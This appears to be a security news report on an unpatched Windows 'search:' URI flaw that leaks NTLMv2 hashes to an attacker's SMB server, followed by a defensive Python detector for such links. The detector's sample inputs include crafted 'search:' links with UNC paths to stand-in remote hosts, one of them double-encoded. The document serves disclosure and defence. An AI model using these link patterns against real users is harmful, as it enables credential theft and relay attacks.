Vulnerability Overview
Cybersecurity researchers have uncovered a new unpatched issue in Microsoft Windows that could allow attackers to steal NTLMv2 hashes from unsuspecting users. The flaw resides in the Windows Search URI handler, specifically within the ‘search:’ protocol. Security firm Huntress reported that this vulnerability can be exploited to leak a user’s Net-NTLMv2 hash when they click a specially crafted link in a web browser, email, or other URL source.
The technique is similar to a previously patched vulnerability in the Windows Snipping Tool’s URI handler, which also leaked NTLM hashes via SMB connections. In this case, the attack uses the ‘search:’ protocol with a ‘crumb=location:’ parameter that points to an attacker-controlled SMB server. When the user clicks the link, the system attempts to connect to the malicious server, triggering NTLM authentication and exposing the hash.
Impact and Scope
Huntress researcher Andrew Schwartz noted that this vulnerability uses the same NTLM leakage mechanism as the prior flaw and carries the same Moderate severity rating. An attacker who successfully obtains the NTLMv2 hash could use it in relay attacks to gain unauthorized access to network resources or authenticate as the victim on other systems.
Microsoft was notified of the issue on April 15, 2026, but declined to issue a patch, stating that only vulnerabilities rated Important or Critical meet their servicing threshold. This leaves Windows users exposed, as the attack requires minimal user interaction and can be launched from a simple web page or email link. Organizations should consider additional security measures such as blocking outbound SMB traffic and educating users about suspicious links.
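A defender-side check for the link pattern described in the overview, as an added example that is not code from Huntress or Microsoft: it scans text such as mail bodies or proxy logs for 'search:' URIs whose 'crumb=location:' value is a UNC path to a host outside an allow-list. The function names, the allow-list suffix, the 'query=' parameter and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Candidate 'search:' URIs embedded in arbitrary text (HTML, mail body, proxy log).
URI_RE = re.compile(r"(?<![\w+.-])search:[^\s\"'<>]+", re.IGNORECASE)
CRUMB_RE = re.compile(r"crumb=location:([^&]*)", re.IGNORECASE)
# UNC form \\host\share (forward slashes tolerated); group 1 is the host.
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)")
# Assumption: suffix of file servers the organisation legitimately searches over SMB.
ALLOWED_SUFFIXES = (".corp.example",)


def decode(uri, rounds=3):
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def remote_hosts(text):
    """Hosts named by crumb=location: UNC paths in any search: URI in text."""
    hosts = []
    for match in URI_RE.finditer(text):
        uri = decode(match.group(0))
        for crumb in CRUMB_RE.finditer(uri):
            unc = UNC_RE.match(crumb.group(1).strip())
            if unc:
                hosts.append(unc.group(1).lower())
    return hosts


def flag(text):
    """Hosts that are not on the allow-list, i.e. worth an alert."""
    return [h for h in remote_hosts(text) if not h.endswith(ALLOWED_SUFFIXES)]


# Constructed sample input (not taken from the report).
SAMPLES = [
    r'<a href="search:query=q&crumb=location:\\files.example.net\share">report</a>',
    'GET /r?u=search:crumb=location:%255C%255C203.0.113.7%255Cdocs HTTP/1.1',
    r'search:query=budget&crumb=location:\\fs01.corp.example\finance',
    r'search:query=budget&crumb=location:C:\Users\Public',
    r'see research:crumb=location:\\ignored.example\x',
]

if __name__ == "__main__":
    print([flag(s) for s in SAMPLES])
```

The second sample is double percent-encoded, which is why decoding runs more than once before matching; local paths and allow-listed servers produce no alert.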
Source: The Hacker News

